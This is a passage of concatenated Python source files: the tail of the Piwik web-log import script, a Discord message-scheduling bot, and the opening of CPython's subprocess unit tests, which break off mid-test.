= urlparse.urlparse(main_url) host = parts.scheme + '://' + host return host def _record_hits(self, hits): """ Inserts several hits into Piwik. """ if not config.options.dry_run: data = { 'token_auth': config.options.piwik_token_auth, 'requests': [self._get_hit_args(hit) for hit in hits] } try: args = {} if config.options.debug_tracker: args['debug'] = '1' response = piwik.call( '/piwik.php', args=args, expected_content=None, headers={'Content-type': 'application/json'}, data=data, on_failure=self._on_tracking_failure ) if config.options.debug_tracker: logging.debug('tracker response:\n%s' % response) # check for invalid requests try: response = json.loads(response) except: logging.info("bulk tracking returned invalid JSON") # don't display the tracker response if we're debugging the tracker. # debug tracker output will always break the normal JSON output. if not config.options.debug_tracker: logging.info("tracker response:\n%s" % response) response = {} if ('invalid_indices' in response and isinstance(response['invalid_indices'], list) and response['invalid_indices']): invalid_count = len(response['invalid_indices']) invalid_lines = [str(hits[index].lineno) for index in response['invalid_indices']] invalid_lines_str = ", ".join(invalid_lines) stats.invalid_lines.extend(invalid_lines) logging.info("The Piwik tracker identified %s invalid requests on lines: %s" % (invalid_count, invalid_lines_str)) elif 'invalid' in response and response['invalid'] > 0: logging.info("The Piwik tracker identified %s invalid requests." % response['invalid']) except Piwik.Error, e: # if the server returned 400 code, BulkTracking may not be enabled if e.code == 400: fatal_error("Server returned status 400 (Bad Request).\nIs the BulkTracking plugin disabled?", hits[0].filename, hits[0].lineno) raise stats.count_lines_recorded.advance(len(hits)) def _is_json(self, result): try: json.loads(result) return True except ValueError, e: return False def _on_tracking_failure(self, response, data): """ Removes the successfully tracked hits from the request payload so they are not logged twice. """ try: response = json.loads(response) except: # the response should be in JSON, but in case it can't be parsed just try another attempt logging.debug("cannot parse tracker response, should be valid JSON") return response # remove the successfully tracked hits from payload tracked = response['tracked'] data['requests'] = data['requests'][tracked:] return response['message'] class Hit(object): """ It's a simple container. """ def __init__(self, **kwargs): for key, value in kwargs.iteritems(): setattr(self, key, value) super(Hit, self).__init__() if config.options.force_lowercase_path: self.full_path = self.full_path.lower() def get_visitor_id_hash(self): visitor_id = self.ip if config.options.replay_tracking: for param_name_to_use in ['uid', 'cid', '_id', 'cip']: if param_name_to_use in self.args: visitor_id = self.args[param_name_to_use] break return abs(hash(visitor_id)) def add_page_custom_var(self, key, value): """ Adds a page custom variable to this Hit. """ self._add_custom_var(key, value, 'cvar') def add_visit_custom_var(self, key, value): """ Adds a visit custom variable to this Hit. """ self._add_custom_var(key, value, '_cvar') def _add_custom_var(self, key, value, api_arg_name): if api_arg_name not in self.args: self.args[api_arg_name] = {} if isinstance(self.args[api_arg_name], basestring): logging.debug("Ignoring custom %s variable addition [ %s = %s ], custom var already set to string." % (api_arg_name, key, value)) return index = len(self.args[api_arg_name]) + 1 self.args[api_arg_name][index] = [key, value] class Parser(object): """ The Parser parses the lines in a specified file and inserts them into a Queue. """ def __init__(self): self.check_methods = [method for name, method in inspect.getmembers(self, predicate=inspect.ismethod) if name.startswith('check_')] ## All check_* methods are called for each hit and must return True if the ## hit can be imported, False otherwise. def check_hostname(self, hit): # Check against config.hostnames. if not hasattr(hit, 'host') or not config.options.hostnames: return True # Accept the hostname only if it matches one pattern in the list. result = any( fnmatch.fnmatch(hit.host, pattern) for pattern in config.options.hostnames ) if not result: stats.count_lines_hostname_skipped.increment() return result def check_static(self, hit): if hit.extension in STATIC_EXTENSIONS: if config.options.enable_static: hit.is_download = True return True else: stats.count_lines_static.increment() return False return True def check_download(self, hit): if hit.extension in config.options.download_extensions: stats.count_lines_downloads.increment() hit.is_download = True return True # the file is not in the white-listed downloads # if it's a know download file, we shall skip it elif hit.extension in DOWNLOAD_EXTENSIONS: stats.count_lines_skipped_downloads.increment() return False return True def check_user_agent(self, hit): user_agent = hit.user_agent.lower() for s in itertools.chain(EXCLUDED_USER_AGENTS, config.options.excluded_useragents): if s in user_agent: if config.options.enable_bots: hit.is_robot = True return True else: stats.count_lines_skipped_user_agent.increment() return False return True def check_http_error(self, hit): if hit.status[0] in ('4', '5'): if config.options.replay_tracking: # process error logs for replay tracking, since we don't care if piwik error-ed the first time return True elif config.options.enable_http_errors: hit.is_error = True return True else: stats.count_lines_skipped_http_errors.increment() return False return True def check_http_redirect(self, hit): if hit.status[0] == '3' and hit.status != '304': if config.options.enable_http_redirects: hit.is_redirect = True return True else: stats.count_lines_skipped_http_redirects.increment() return False return True def check_path(self, hit): for excluded_path in config.options.excluded_paths: if fnmatch.fnmatch(hit.path, excluded_path): return False # By default, all paths are included. if config.options.included_paths: for included_path in config.options.included_paths: if fnmatch.fnmatch(hit.path, included_path): return True return False return True @staticmethod def check_format(lineOrFile): format = False format_groups = 0 for name, candidate_format in FORMATS.iteritems(): logging.debug("Check format %s", name) match = None try: if isinstance(lineOrFile, basestring): match = candidate_format.check_format_line(lineOrFile) else: match = candidate_format.check_format(lineOrFile) except Exception, e: logging.debug('Error in format checking: %s', traceback.format_exc()) pass if match: logging.debug('Format %s matches', name) # compare format groups if this *BaseFormat has groups() method try: # if there's more info in this match, use this format match_groups = len(match.groups()) logging.debug('Format match contains %d groups' % match_groups) if format_groups < match_groups: format = candidate_format format_groups = match_groups except AttributeError: format = candidate_format else: logging.debug('Format %s does not match', name) # if the format is W3cExtendedFormat, check if the logs are from IIS and if so, issue a warning if the # --w3c-time-taken-milli option isn't set if isinstance(format, W3cExtendedFormat): format.check_for_iis_option() return format @staticmethod def detect_format(file): """ Return the best matching format for this file, or None if none was found. """ logging.debug('Detecting the log format') format = False # check the format using the file (for formats like the W3cExtendedFormat one) format = Parser.check_format(file) # check the format using the first N lines (to avoid irregular ones) lineno = 0 limit = 100000 while not format and lineno < limit: line = file.readline() if not line: # if at eof, don't keep looping break lineno = lineno + 1 logging.debug("Detecting format against line %i" % lineno) format = Parser.check_format(line) try: file.seek(0) except IOError: pass if not format: fatal_error("cannot automatically determine the log format using the first %d lines of the log file. " % limit + "\nMaybe try specifying the format with the --log-format-name command line argument." ) return logging.debug('Format %s is the best match', format.name) return format def parse(self, filename): """ Parse the specified filename and insert hits in the queue. """ def invalid_line(line, reason): stats.count_lines_invalid.increment() if config.options.debug >= 2: logging.debug('Invalid line detected (%s): %s' % (reason, line)) if filename == '-': filename = '(stdin)' file = sys.stdin else: if not os.path.exists(filename): print >> sys.stderr, "\n=====> Warning: File %s does not exist <=====" % filename return else: if filename.endswith('.bz2'): open_func = bz2.BZ2File elif filename.endswith('.gz'): open_func = gzip.open else: open_func = open file = open_func(filename, 'r') if config.options.show_progress: print 'Parsing log %s...' % filename if config.format: # The format was explicitely specified. format = config.format if isinstance(format, W3cExtendedFormat): format.create_regex(file) if format.regex is None: return fatal_error( "File is not in the correct format, is there a '#Fields:' line? " "If not, use the --w3c-fields option." ) else: # If the file is empty, don't bother. data = file.read(100) if len(data.strip()) == 0: return try: file.seek(0) except IOError: pass format = self.detect_format(file) if format is None: return fatal_error( 'Cannot guess the logs format. Please give one using ' 'either the --log-format-name or --log-format-regex option' ) # Make sure the format is compatible with the resolver. resolver.check_format(format) if config.options.dump_log_regex: logging.info("Using format '%s'." % format.name) if format.regex: logging.info("Regex being used: %s" % format.regex.pattern) else: logging.info("Format %s does not use a regex to parse log lines." % format.name) logging.info("--dump-log-regex option used, aborting log import.") os._exit(0) valid_lines_count = 0 hits = [] for lineno, line in enumerate(file): try: line = line.decode(config.options.encoding) except UnicodeDecodeError: invalid_line(line, 'invalid encoding') continue stats.count_lines_parsed.increment() if stats.count_lines_parsed.value <= config.options.skip: continue match = format.match(line) if not match: invalid_line(line, 'line did not match') continue valid_lines_count = valid_lines_count + 1 if config.options.debug_request_limit and valid_lines_count >= config.options.debug_request_limit: if len(hits) > 0: Recorder.add_hits(hits) logging.info("Exceeded limit specified in --debug-request-limit, exiting.") return hit = Hit( filename=filename, lineno=lineno, status=format.get('status'), full_path=format.get('path'), is_download=False, is_robot=False, is_error=False, is_redirect=False, args={}, ) if config.options.regex_group_to_page_cvars_map: self._add_custom_vars_from_regex_groups(hit, format, config.options.regex_group_to_page_cvars_map, True) if config.options.regex_group_to_visit_cvars_map: self._add_custom_vars_from_regex_groups(hit, format, config.options.regex_group_to_visit_cvars_map, False) if config.options.regex_groups_to_ignore: format.remove_ignored_groups(config.options.regex_groups_to_ignore) try: hit.query_string = format.get('query_string') hit.path = hit.full_path except BaseFormatException: hit.path, _, hit.query_string = hit.full_path.partition(config.options.query_string_delimiter) # W3cExtendedFormat detaults to - when there is no query string, but we want empty string if hit.query_string == '-': hit.query_string = '' hit.extension = hit.path.rsplit('.')[-1].lower() try: hit.referrer = format.get('referrer') if hit.referrer.startswith('"'): hit.referrer = hit.referrer[1:-1] except BaseFormatException: hit.referrer = '' if hit.referrer == '-': hit.referrer = '' try: hit.user_agent = format.get('user_agent') # in case a format parser included enclosing quotes, remove them so they are not # sent to Piwik if hit.user_agent.startswith('"'): hit.user_agent = hit.user_agent[1:-1] except BaseFormatException: hit.user_agent = '' hit.ip = format.get('ip') try: hit.length = int(format.get('length')) except (ValueError, BaseFormatException): # Some lines or formats don't have a length (e.g. 304 redirects, W3C logs) hit.length = 0 try: hit.generation_time_milli = float(format.get('generation_time_milli')) except BaseFormatException: try: hit.generation_time_milli = float(format.get('generation_time_micro')) / 1000 except BaseFormatException: try: hit.generation_time_milli = float(format.get('generation_time_secs')) * 1000 except BaseFormatException: hit.generation_time_milli = 0 if config.options.log_hostname: hit.host = config.options.log_hostname else: try: hit.host = format.get('host').lower().strip('.') if hit.host.startswith('"'): hit.host = hit.host[1:-1] except BaseFormatException: # Some formats have no host. pass # Add userid try: hit.userid = None userid = format.get('userid') if userid != '-': hit.args['uid'] = hit.userid = userid except: pass # add event info try: hit.event_category = hit.event_action = hit.event_name = None hit.event_category = format.get('event_category') hit.event_action = format.get('event_action') hit.event_name = format.get('event_name') if hit.event_name == '-': hit.event_name = None except: pass # Check if the hit must be excluded. if not all((method(hit) for method in self.check_methods)): continue # Parse date. # We parse it after calling check_methods as it's quite CPU hungry, and # we want to avoid that cost for excluded hits. date_string = format.get('date') try: hit.date = datetime.datetime.strptime(date_string, format.date_format) except ValueError, e: invalid_line(line, 'invalid date or invalid format: %s' % str(e)) continue # Parse timezone and substract its value from the date try: timezone = float(format.get('timezone')) except BaseFormatException: timezone = 0 except ValueError: invalid_line(line, 'invalid timezone') continue if timezone: hit.date -= datetime.timedelta(hours=timezone/100) if config.options.replay_tracking: # we need a query string and we only consider requests with piwik.php if not hit.query_string or not hit.path.lower().endswith(config.options.replay_tracking_expected_tracker_file): invalid_line(line, 'no query string, or ' + hit.path.lower() + ' does not end with piwik.php') continue query_arguments = urlparse.parse_qs(hit.query_string) if not "idsite" in query_arguments: invalid_line(line, 'missing idsite') continue try: hit.args.update((k, v.pop().encode('raw_unicode_escape').decode(config.options.encoding)) for k, v in query_arguments.iteritems()) except UnicodeDecodeError: invalid_line(line, 'invalid encoding') continue hits.append(hit) if len(hits) >= config.options.recorder_max_payload_size * len(Recorder.recorders): Recorder.add_hits(hits) hits = [] # add last chunk of hits if len(hits) > 0: Recorder.add_hits(hits) def _add_custom_vars_from_regex_groups(self, hit, format, groups, is_page_var): for group_name, custom_var_name in groups.iteritems(): if group_name in format.get_all(): value = format.get(group_name) # don't track the '-' empty placeholder value if value == '-': continue if is_page_var: hit.add_page_custom_var(custom_var_name, value) else: hit.add_visit_custom_var(custom_var_name, value) def main(): """ Start the importing process. """ stats.set_time_start() if config.options.show_progress: stats.start_monitor() recorders = Recorder.launch(config.options.recorders) try: for filename in config.filenames: parser.parse(filename) Recorder.wait_empty() except KeyboardInterrupt: pass stats.set_time_stop() if config.options.show_progress: stats.stop_monitor() stats.print_summary() def fatal_error(error, filename=None, lineno=None): print >> sys.stderr, 'Fatal error: %s' % error if filename and lineno is not None: print >> sys.stderr, ( 'You can restart the import of "%s" from the point it failed by ' 'specifying --skip=%d on the command line.\n' % (filename, lineno) ) os._exit(1) if __name__ == '__main__': try: piwik = Piwik() config = Configuration() stats = Statistics() resolver = config.get_resolver() parser = Parser() main() sys.exit(0) except KeyboardInterrupt: pass
main.py
''' __author__ = "Rodrigo Sobral" __copyright__ = "Copyright 2021, Rodrigo Sobral" __credits__ = ["Rodrigo Sobral"] __license__ = "MIT" __version__ = "1.0.1" __maintainer__ = "Rodrigo Sobral" __email__ = "rodrigosobral@sapo.pt" __status__ = "Beta" ''' import discord, datetime from dotenv import load_dotenv from keep_alive import keep_alive from db_manage import insertNewMessage, message_db, getMostRecentMessageTime, logSentMessage from os import getenv from threading import Thread from time import sleep def defineBotIntents(): intents = discord.Intents.default() intents.members = True return intents client = discord.Client(command_prefix='!', intents=defineBotIntents(), help_command='!sch help') wait_flag= False # ================================================================================ @client.event async def on_ready(): print('We have logged in as {0.user}'.format(client)) @client.event async def on_message(command: discord.Message): if command.author.bot: return # Ask for help showing all the commands available if command.content=='!sch help': await command.channel.send(':clipboard: Here\'s a list of the current commands:\n`!sch <message> <target?> | <hours> <date?>`\n\nExample: ```!sch Have a good dinner John and Harry! @John @Harry | 20:21 19/07/2021\nor\n!sch Good morning guys! | 08:00```\n') # Schedule a message to be sent elif command.content.startswith('!sch'): command.content= command.content[4:] tagged_users=[] if command.content.find('<@!')==-1 or command.mention_everyone: [tagged_users.append(member) for member in command.channel.members if not member.bot] else: [tagged_users.append(member) for member in command.mentions if not member.bot] # Get Deliver Time from message if command.content.count('|')!=1: return await command.channel.send(':warning: Invalid command format.\nExample: ```!sch Have a good dinner John and Harry! @John @Harry | 20:21 19/07/2021```\n') inputed_date= command.content[command.content.find(' | ')+3:] # If the date is not given, use the current date deliver_date= getHoursAndDate(inputed_date) if not deliver_date: deliver_date=getOnlyHours(inputed_date) if not deliver_date: return await command.channel.send(':warning: Invalid deliver time format.\nExample: ```!sch Have a good dinner John and Harry! @John @Harry | 20:21 19/07/2021```\n') del inputed_date # Get Attachments from message attachments= await getAttachmentsFromMessage(command.attachments) # Clear date and hours from message command.content= clearString(command.content[:command.content.find(' | ')]) if not command.content and len(attachments)==0: return await command.channel.send(':warning: You must send any type of information (text or files)\n') message_container= { 'channel_name': command.channel.name, 'sender': command.author, 'receivers': tagged_users, 'content': command.content, 'deliver_date': deliver_date, 'attachments': attachments } # Stores the new message to the queue try: insertNewMessage(message_container) except Exception as e: return await command.channel.send(str(e)) return await command.channel.send(':white_check_mark: Your message \'{}\' (containing {} attachments) will be sent to{} at '.format(message_container['content'], len(attachments), printUsersTag(message_container['receivers'])) + deliver_date.strftime("%H:%M:%S, %d/%m/%Y")) # Event triggered by TrackTime to send direct messages to the tagged users @client.event async def on_sendDMs(): global wait_flag for receiver in message_db[0]['receivers']: await receiver.send('{} sent you a message (with {} attachments): {}'.format(printUserTag(message_db[0]['sender']), len(message_db[0]['attachments']), message_db[0]['content'])) [await receiver.send(file=attachment) for attachment in message_db[0]['attachments']] registMessage(message_db[0]) message_db.pop(0) wait_flag= False # ================================================================================ # Clear all the not necessary spaces until the string is cleared or empty def clearString(string: str): id_index= string.find('<@!') if id_index!=-1: string= string[:id_index] while string and string[0].isspace(): string= string[1:] while string and string[-1].isspace(): string= string[:-1] return string # When the command only indicates hours (the date is, by default, today's date) def getOnlyHours(inputed_date:str): today= datetime.datetime.now() try: hour= datetime.datetime.strptime(inputed_date, '%H:%M:%S') except: try: hour= datetime.datetime.strptime(inputed_date, '%H:%M') except: return None return today.replace(hour=hour.hour, minute=hour.minute, second=hour.second, microsecond=0) # When the command indicates hours and a date to the message be delivered def getHoursAndDate(inpute_date: str): if inpute_date.find(' ')==-1: return None try: date= datetime.datetime.strptime(inpute_date, '%H:%M:%S %d/%m/%Y') except: try: date= datetime.datetime.strptime(inpute_date, '%H:%M %d/%m/%Y') except: return None return date # Get the list of attachments from the command and returns a list of discord.Files async def getAttachmentsFromMessage(attachments_list: list) -> discord.File: if len(attachments_list)==0: return [] files= [] for attachment in attachments_list: new_file= await discord.Attachment.to_file(attachment) files.append(discord.File(new_file.fp, filename=new_file.filename)) return files def printUserTag(user: discord.User): return '<@!'+str(user.id)+'>' def printUsersTag(users: list): text_format= '' for user in users: text_format+= ' <@!'+str(user.id)+'>' return text_format def printUserName(user: discord.User): return str(user.name) def printUsersName(users: list): text_format= '' for user in users: text_format+= ' '+str(user.name) return text_format # Sends a formatted log of a sent message to logSentMessage(), in db_manage.py def registMessage(message_container: dict): logSentMessage('{}: {} [{}] ->{} | '.format(message_db[0]['channel_name'], printUserName(message_db[0]['sender']), len(message_db[0]['attachments']), printUsersName(message_container['receivers'])) + message_container['deliver_date'].strftime("%H:%M:%S, %d/%m/%Y")) # We keep tracking current time to send messages in real time def trackTime(): global wait_flag print('Tracking Time...') while True: now = datetime.datetime.now().replace(microsecond=0) first_message_time= getMostRecentMessageTime() if not wait_flag and first_message_time and first_message_time <= now: client.dispatch('sendDMs') wait_flag= True sleep(1) # ================================================================================ def runClient(): client.run(getenv('SCHEDULING_BOT_TOKEN')) if __name__ == "__main__": load_dotenv() Thread(target=runClient).start() Thread(target=trackTime).start() keep_alive()
test_subprocess.py
import unittest from test import script_helper from test import support import subprocess import sys import signal import io import locale import os import errno import tempfile import time import re import selectors import sysconfig import warnings import select import shutil import gc import textwrap try: import threading except ImportError: threading = None mswindows = (sys.platform == "win32") # # Depends on the following external programs: Python # if mswindows: SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), ' 'os.O_BINARY);') else: SETBINARY = '' try: mkstemp = tempfile.mkstemp except AttributeError: # tempfile.mkstemp is not available def mkstemp(): """Replacement for mkstemp, calling mktemp.""" fname = tempfile.mktemp() return os.open(fname, os.O_RDWR|os.O_CREAT), fname class BaseTestCase(unittest.TestCase): def setUp(self): # Try to minimize the number of children we have so this test # doesn't crash on some buildbots (Alphas in particular). support.reap_children() def tearDown(self): for inst in subprocess._active: inst.wait() subprocess._cleanup() self.assertFalse(subprocess._active, "subprocess._active not empty") def assertStderrEqual(self, stderr, expected, msg=None): # In a debug build, stuff like "[6580 refs]" is printed to stderr at # shutdown time. That frustrates tests trying to check stderr produced # from a spawned Python process. actual = support.strip_python_stderr(stderr) # strip_python_stderr also strips whitespace, so we do too. expected = expected.strip() self.assertEqual(actual, expected, msg) class PopenTestException(Exception): pass class PopenExecuteChildRaises(subprocess.Popen): """Popen subclass for testing cleanup of subprocess.PIPE filehandles when _execute_child fails. """ def _execute_child(self, *args, **kwargs): raise PopenTestException("Forced Exception for Test") class ProcessTestCase(BaseTestCase): def test_io_buffered_by_default(self): p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) try: self.assertIsInstance(p.stdin, io.BufferedIOBase) self.assertIsInstance(p.stdout, io.BufferedIOBase) self.assertIsInstance(p.stderr, io.BufferedIOBase) finally: p.stdin.close() p.stdout.close() p.stderr.close() p.wait() def test_io_unbuffered_works(self): p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=0) try: self.assertIsInstance(p.stdin, io.RawIOBase) self.assertIsInstance(p.stdout, io.RawIOBase) self.assertIsInstance(p.stderr, io.RawIOBase) finally: p.stdin.close() p.stdout.close() p.stderr.close() p.wait() def test_call_seq(self): # call() function with sequence argument rc = subprocess.call([sys.executable, "-c", "import sys; sys.exit(47)"]) self.assertEqual(rc, 47) def test_call_timeout(self): # call() function with timeout argument; we want to test that the child # process gets killed when the timeout expires. If the child isn't # killed, this call will deadlock since subprocess.call waits for the # child. self.assertRaises(subprocess.TimeoutExpired, subprocess.call, [sys.executable, "-c", "while True: pass"], timeout=0.1) def test_check_call_zero(self): # check_call() function with zero return code rc = subprocess.check_call([sys.executable, "-c", "import sys; sys.exit(0)"]) self.assertEqual(rc, 0) def test_check_call_nonzero(self): # check_call() function with non-zero return code with self.assertRaises(subprocess.CalledProcessError) as c: subprocess.check_call([sys.executable, "-c", "import sys; sys.exit(47)"]) self.assertEqual(c.exception.returncode, 47) def test_check_output(self): # check_output() function with zero return code output = subprocess.check_output( [sys.executable, "-c", "print('BDFL')"]) self.assertIn(b'BDFL', output) def test_check_output_nonzero(self): # check_call() function with non-zero return code with self.assertRaises(subprocess.CalledProcessError) as c: subprocess.check_output( [sys.executable, "-c", "import sys; sys.exit(5)"]) self.assertEqual(c.exception.returncode, 5) def test_check_output_stderr(self): # check_output() function stderr redirected to stdout output = subprocess.check_output( [sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"], stderr=subprocess.STDOUT) self.assertIn(b'BDFL', output) def test_check_output_stdin_arg(self): # check_output() can be called with stdin set to a file tf = tempfile.TemporaryFile() self.addCleanup(tf.close) tf.write(b'pear') tf.seek(0) output = subprocess.check_output( [sys.executable, "-c", "import sys; sys.stdout.write(sys.stdin.read().upper())"], stdin=tf) self.assertIn(b'PEAR', output) def test_check_output_input_arg(self): # check_output() can be called with input set to a string output = subprocess.check_output( [sys.executable, "-c", "import sys; sys.stdout.write(sys.stdin.read().upper())"], input=b'pear') self.assertIn(b'PEAR', output) def test_check_output_stdout_arg(self): # check_output() refuses to accept 'stdout' argument with self.assertRaises(ValueError) as c: output = subprocess.check_output( [sys.executable, "-c", "print('will not be run')"], stdout=sys.stdout) self.fail("Expected ValueError when stdout arg supplied.") self.assertIn('stdout', c.exception.args[0]) def test_check_output_stdin_with_input_arg(self): # check_output() refuses to accept 'stdin' with 'input' tf = tempfile.TemporaryFile() self.addCleanup(tf.close) tf.write(b'pear') tf.seek(0) with self.assertRaises(ValueError) as c: output = subprocess.check_output( [sys.executable, "-c", "print('will not be run')"], stdin=tf, input=b'hare') self.fail("Expected ValueError when stdin and input args supplied.") self.assertIn('stdin', c.exception.args[0]) self.assertIn('input', c.exception.args[0]) def test_check_output_timeout(self): # check_output() function with timeout arg with self.assertRaises(subprocess.TimeoutExpired) as c: output = subprocess.check_output( [sys.executable, "-c", "import sys, time\n" "sys.stdout.write('BDFL')\n" "sys.stdout.flush()\n" "time.sleep(3600)"], # Some heavily loaded buildbots (sparc Debian 3.x) require # this much time to start and print. timeout=3) self.fail("Expected TimeoutExpired.") self.assertEqual(c.exception.output, b'BDFL') def test_call_kwargs(self): # call() function with keyword args newenv = os.environ.copy() newenv["FRUIT"] = "banana" rc = subprocess.call([sys.executable, "-c", 'import sys, os;' 'sys.exit(os.getenv("FRUIT")=="banana")'], env=newenv) self.assertEqual(rc, 1) def test_invalid_args(self): # Popen() called with invalid arguments should raise TypeError # but Popen.__del__ should not complain (issue #12085) with support.captured_stderr() as s: self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1) argcount = subprocess.Popen.__init__.__code__.co_argcount too_many_args = [0] * (argcount + 1) self.assertRaises(TypeError, subprocess.Popen, *too_many_args) self.assertEqual(s.getvalue(), '') def test_stdin_none(self): # .stdin is None when not redirected p = subprocess.Popen([sys.executable, "-c", 'print("banana")'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) p.wait() self.assertEqual(p.stdin, None) def test_stdout_none(self): # .stdout is None when not redirected, and the child's stdout will # be inherited from the parent. In order to test this we run a # subprocess in a subprocess: # this_test # \-- subprocess created by this test (parent) # \-- subprocess created by the parent subprocess (child) # The parent doesn't specify stdout, so the child will use the # parent's stdout. This test checks that the message printed by the # child goes to the parent stdout. The parent also checks that the # child's stdout is None. See #11963. code = ('import sys; from subprocess import Popen, PIPE;' 'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],' ' stdin=PIPE, stderr=PIPE);' 'p.wait(); assert p.stdout is None;') p = subprocess.Popen([sys.executable, "-c", code], stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) out, err = p.communicate() self.assertEqual(p.returncode, 0, err) self.assertEqual(out.rstrip(), b'test_stdout_none') def test_stderr_none(self): # .stderr is None when not redirected p = subprocess.Popen([sys.executable, "-c", 'print("banana")'], stdin=subprocess.PIPE, stdout=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stdin.close) p.wait() self.assertEqual(p.stderr, None) def _assert_python(self, pre_args, **kwargs): # We include sys.exit() to prevent the test runner from hanging # whenever python is found. args = pre_args + ["import sys; sys.exit(47)"] p = subprocess.Popen(args, **kwargs) p.wait() self.assertEqual(47, p.returncode) def test_executable(self): # Check that the executable argument works. # # On Unix (non-Mac and non-Windows), Python looks at args[0] to # determine where its standard library is, so we need the directory # of args[0] to be valid for the Popen() call to Python to succeed. # See also issue #16170 and issue #7774. doesnotexist = os.path.join(os.path.dirname(sys.executable), "doesnotexist") self._assert_python([doesnotexist, "-c"], executable=sys.executable) def test_executable_takes_precedence(self): # Check that the executable argument takes precedence over args[0]. # # Verify first that the call succeeds without the executable arg. pre_args = [sys.executable, "-c"] self._assert_python(pre_args) self.assertRaises(FileNotFoundError, self._assert_python, pre_args, executable="doesnotexist") @unittest.skipIf(mswindows, "executable argument replaces shell") def test_executable_replaces_shell(self): # Check that the executable argument replaces the default shell # when shell=True. self._assert_python([], executable=sys.executable, shell=True) # For use in the test_cwd* tests below. def _normalize_cwd(self, cwd): # Normalize an expected cwd (for Tru64 support). # We can't use os.path.realpath since it doesn't expand Tru64 {memb} # strings. See bug #1063571. original_cwd = os.getcwd() os.chdir(cwd) cwd = os.getcwd() os.chdir(original_cwd) return cwd # For use in the test_cwd* tests below. def _split_python_path(self): # Return normalized (python_dir, python_base). python_path = os.path.realpath(sys.executable) return os.path.split(python_path) # For use in the test_cwd* tests below. def _assert_cwd(self, expected_cwd, python_arg, **kwargs): # Invoke Python via Popen, and assert that (1) the call succeeds, # and that (2) the current working directory of the child process # matches *expected_cwd*. p = subprocess.Popen([python_arg, "-c", "import os, sys; " "sys.stdout.write(os.getcwd()); " "sys.exit(47)"], stdout=subprocess.PIPE, **kwargs) self.addCleanup(p.stdout.close) p.wait() self.assertEqual(47, p.returncode) normcase = os.path.normcase self.assertEqual(normcase(expected_cwd), normcase(p.stdout.read().decode("utf-8"))) def test_cwd(self): # Check that cwd changes the cwd for the child process. temp_dir = tempfile.gettempdir() temp_dir = self._normalize_cwd(temp_dir) self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir) @unittest.skipIf(mswindows, "pending resolution of issue #15533") def test_cwd_with_relative_arg(self): # Check that Popen looks for args[0] relative to cwd if args[0] # is relative. python_dir, python_base = self._split_python_path() rel_python = os.path.join(os.curdir, python_base) with support.temp_cwd('test_cwd_with_relative_arg', quiet=True) as wrong_dir: # gevent: use distinct name, avoid Travis CI failure # Before calling with the correct cwd, confirm that the call fails # without cwd and with the wrong cwd. self.assertRaises(FileNotFoundError, subprocess.Popen, [rel_python]) self.assertRaises(FileNotFoundError, subprocess.Popen, [rel_python], cwd=wrong_dir) python_dir = self._normalize_cwd(python_dir) self._assert_cwd(python_dir, rel_python, cwd=python_dir) @unittest.skipIf(mswindows, "pending resolution of issue #15533") def test_cwd_with_relative_executable(self): # Check that Popen looks for executable relative to cwd if executable # is relative (and that executable takes precedence over args[0]). python_dir, python_base = self._split_python_path() rel_python = os.path.join(os.curdir, python_base) doesntexist = "somethingyoudonthave" with support.temp_cwd('test_cwd_with_relative_executable', quiet=True) as wrong_dir: # gevent: use distinct name, avoid Travis CI failure # Before calling with the correct cwd, confirm that the call fails # without cwd and with the wrong cwd. self.assertRaises(FileNotFoundError, subprocess.Popen, [doesntexist], executable=rel_python) self.assertRaises(FileNotFoundError, subprocess.Popen, [doesntexist], executable=rel_python, cwd=wrong_dir) python_dir = self._normalize_cwd(python_dir) self._assert_cwd(python_dir, doesntexist, executable=rel_python, cwd=python_dir) def test_cwd_with_absolute_arg(self): # Check that Popen can find the executable when the cwd is wrong # if args[0] is an absolute path. python_dir, python_base = self._split_python_path() abs_python = os.path.join(python_dir, python_base) rel_python = os.path.join(os.curdir, python_base) with script_helper.temp_dir() as wrong_dir: # Before calling with an absolute path, confirm that using a # relative path fails. self.assertRaises(FileNotFoundError, subprocess.Popen, [rel_python], cwd=wrong_dir) wrong_dir = self._normalize_cwd(wrong_dir) self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir) @unittest.skipIf(sys.base_prefix != sys.prefix, 'Test is not venv-compatible') def test_executable_with_cwd(self): python_dir, python_base = self._split_python_path() python_dir = self._normalize_cwd(python_dir) self._assert_cwd(python_dir, "somethingyoudonthave", executable=sys.executable, cwd=python_dir) @unittest.skipIf(sys.base_prefix != sys.prefix, 'Test is not venv-compatible') @unittest.skipIf(sysconfig.is_python_build(), "need an installed Python. See #7774") def test_executable_without_cwd(self): # For a normal installation, it should work without 'cwd' # argument. For test runs in the build directory, see #7774. self._assert_cwd(os.getcwd(), "somethingyoudonthave", executable=sys.executable) def test_stdin_pipe(self): # stdin redirection p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.exit(sys.stdin.read() == "pear")'], stdin=subprocess.PIPE) p.stdin.write(b"pear") p.stdin.close() p.wait() self.assertEqual(p.returncode, 1) def test_stdin_filedes(self): # stdin is set to open file descriptor tf = tempfile.TemporaryFile() self.addCleanup(tf.close) d = tf.fileno() os.write(d, b"pear") os.lseek(d, 0, 0) p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.exit(sys.stdin.read() == "pear")'], stdin=d) p.wait() self.assertEqual(p.returncode, 1) def test_stdin_fileobj(self): # stdin is set to open file object tf = tempfile.TemporaryFile() self.addCleanup(tf.close) tf.write(b"pear") tf.seek(0) p = subprocess.Popen([sys.executable, "-c", 'import sys; sys.exit(sys.stdin.read() == "pear")'], stdin=tf) p.wait() self.assertEqual(p.returncode, 1) def test_stdout_pipe(self): # stdout redirection p = subprocess.Popen([sys.executable, "-c", 'import sys; 